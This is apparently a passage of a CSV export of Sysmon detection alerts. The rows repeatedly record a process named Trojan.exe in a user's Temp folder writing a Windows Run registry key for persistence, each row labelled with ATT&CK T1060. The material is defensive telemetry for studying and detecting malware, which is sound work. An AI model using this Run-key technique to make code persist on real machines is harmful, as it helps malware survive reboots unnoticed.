HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:20.471"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:32.613",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:19.455 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:19.458108300Z"",""eventRecordID"":""1393"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:19.455\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:19.455"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.834",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:18.440 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:18.447161500Z"",""eventRecordID"":""1392"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:18.440\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:18.440"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:31.817",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:17.424 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:17.471493300Z"",""eventRecordID"":""1391"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:17.424\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:17.424"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.810",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:16.408 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:16.410983100Z"",""eventRecordID"":""1390"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:16.408\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:16.408"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.738",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:15.393 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:15.410514500Z"",""eventRecordID"":""1389"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:15.393\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:15.393"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:31.723",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:14.377 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:14.382829900Z"",""eventRecordID"":""1388"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:14.377\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:14.377"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.675",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:13.361 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:13.388797400Z"",""eventRecordID"":""1387"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:13.361\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:13.361"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.617",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:12.347 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:12.363480000Z"",""eventRecordID"":""1386"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:12.347\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:12.347"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:31.586",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:11.314 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:11.321567500Z"",""eventRecordID"":""1385"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:11.314\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:11.314"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.493",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:10.286 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:10.287844800Z"",""eventRecordID"":""1381"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:10.286\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:10.286"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.412",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:09.284 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:09.288933200Z"",""eventRecordID"":""1379"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:09.284\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 